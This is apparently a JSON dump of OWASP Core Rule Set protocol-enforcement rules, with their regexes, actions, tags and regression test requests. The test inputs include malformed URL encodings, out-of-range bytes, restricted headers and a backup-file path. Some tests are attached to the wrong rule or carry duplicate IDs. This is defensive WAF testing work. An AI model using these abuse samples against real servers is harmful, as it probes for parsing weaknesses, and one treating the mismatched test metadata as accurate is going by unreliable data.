"User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920500 ] }, "malicious_patterns": [] }, { "description": "Rules 920500 should not block user dir such as /~user/", "test_id": 3, "request": { "method": "GET", "uri": "/~user/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920500 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1067, "variables": [ { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\.[^.~]+~(?:/.*|)$", "actions": [ { "act_name": "id", "lineno": 1068, "act_quote": "no_quote", "act_arg": "920500", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1069, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1070, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1071, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1071, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1072, "act_quote": "quotes", "act_arg": "Attempt to access a backup or working file", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1073, "act_quote": "quotes", "act_arg": "%{TX.0}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1074, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1075, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1076, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1077, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1078, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1079, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1080, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1081, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1082, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1083, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1084, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1067 } }, { "rule_id": "920450", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^.*$", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "1", "message": "HTTP header is restricted by policy (%{MATCHED_VAR})", "logdata": "Restricted header detected: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-range": "test", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920450 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "If": "test", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920450 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "lock-token": "test", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920450 ] }, "malicious_patterns": [] }, { "description": "HTTP header is restricted by policy (920450) from old modsec regressions, we no longer block proxy-connection in 3.0", "test_id": 4, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920450 ] }, "malicious_patterns": [] }, { "description": "HTTP header is restricted by policy (920450) from old modsec regressions", "test_id": 5, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Lock-Token": "\n \n \n http://www.w3.org/2002/03/xkms#Pending\n %1Gwww.attack.org\n \n \n\n" }, "expected": { "should_block": false, "rule_ids": [ 920240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\n \n \n http://www.w3.org/2002/03/xkms#Pending\n %1Gwww.attack.org\n \n \n\n" } ] }, { "description": "", "test_id": 5, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "9" }, "data": "param=%1G" }, "expected": { "should_block": true, "rule_ids": [ 920240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "param=%1G" } ] }, { "description": "", "test_id": 6, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded" }, "data": "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" }, "expected": { "should_block": true, "rule_ids": [ 920240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1487, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Type", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?i)application/x-www-form-urlencoded", "actions": [ { "act_name": "id", "lineno": 1488, "act_quote": "no_quote", "act_arg": "920240", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1489, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1490, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1491, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1492, "act_quote": "quotes", "act_arg": "URL Encoding Abuse Attack Attempt", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1493, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1494, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1495, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1496, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1497, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1498, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1499, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1500, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1501, "act_quote": "quotes", "act_arg": "capec/1000/255/153/267/72", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1502, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1503, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 1504, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 1487 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "\\x25", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1505, "variables": [ { "variable": "REQUEST_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\x25", "actions": [ { "act_name": "chain", "lineno": 1506, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 1505 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_BODY", "part": "", "negated": false } ], "operator": { "type": "@validateUrlEncoding", "argument": "", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1507, "variables": [ { "variable": "REQUEST_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@validateUrlEncoding", "operator_argument": "", "actions": [ { "act_name": "setvar", "lineno": 1508, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1507 } }, { "rule_id": "920015", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1510, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 1510, "act_quote": "no_quote", "act_arg": "920015", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1510, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1510, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1510, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1510, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1510, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 1510, "act_quote": "no_quote", "act_arg": "END-REQUEST-920-PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1510 } }, { "rule_id": "920016", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1511, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 1511, "act_quote": "no_quote", "act_arg": "920016", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1511, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1511, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1511, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1511, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1511, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 1511, "act_quote": "no_quote", "act_arg": "END-REQUEST-920-PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1511 } }, { "rule_id": "920272", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_URI_RAW", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "REQUEST_BODY", "part": "", "negated": false } ], "operator": { "type": "@validateByteRange", "argument": "32-36,38-126", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Invalid character in request (outside of printable chars below ascii 127)", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/?test=test1%25", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920272 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=test1%25" } ] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/?test=test1%80", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920272 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=test1%80" } ] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/index.html?test=t%FFest1", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920272 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=t%FFest1" } ] }, { "description": "", "test_id": 4, "request": { "method": null, "uri": "/?test=test1%35", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920272 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=test1%35" } ] }, { "description": "", "test_id": 5, "request": { "method": null, "uri": "/i%FFndex.html?test=test1", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920272 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=test1" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1522, "variables": [ { "variable": "REQUEST_URI_RAW", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@validateByteRange", "operator_argument": "32-36,38-126", "actions": [ { "act_name": "id", "lineno": 1523, "act_quote": "no_quote", "act_arg": "920272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1524, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1525, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1526, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1526, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1527, "act_quote": "quotes", "act_arg": "Invalid character in request (outside of printable chars below ascii 127)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1528, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1529, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1530, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1531, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1532, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1533, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1534, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1535, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1536, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1537, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1538, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1539, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1522 } }, { "rule_id": "920300", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Accept", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Request Missing an Accept Header", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "NOTICE", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "Request Missing an Accept Header (920300) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/", "headers": { "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920300 ] }, "malicious_patterns": [] }, { "description": "OPTIONS request: exempt from requiring an Accept request header", "test_id": 2, "request": { "method": "OPTIONS", "uri": "*", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920300 ] }, "malicious_patterns": [] }, { "description": "CONNECT request: exempt from requiring an Accept request header", "test_id": 3, "request": { "method": "CONNECT", "uri": "www.coreruleset.org:80", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Proxy-Connection": "Keep-Alive" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920300 ] }, "malicious_patterns": [] }, { "description": "User-Agent containing AppleWebKit: exempt from requiring an Accept request header", "test_id": 4, "request": { "method": "GET", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent; AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920300 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "OWASP CRS test agent; AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1557, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Accept", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "id", "lineno": 1558, "act_quote": "no_quote", "act_arg": "920300", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1559, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1560, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1561, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1562, "act_quote": "quotes", "act_arg": "Request Missing an Accept Header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1563, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1564, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1565, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1566, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1567, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1568, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1569, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1570, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1571, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1572, "act_quote": "quotes", "act_arg": "NOTICE", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 1573, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 1557 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_METHOD", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:OPTIONS|CONNECT)$", "negated": true } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1574, "variables": [ { "variable": "REQUEST_METHOD", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:OPTIONS|CONNECT)$", "actions": [ { "act_name": "chain", "lineno": 1575, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": true, "oplineno": 1574 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false } ], "operator": { "type": "@pm", "argument": "AppleWebKit Android", "negated": true } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1576, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@pm", "operator_argument": "AppleWebKit Android", "actions": [ { "act_name": "t", "lineno": 1577, "act_quote": "no_quote", 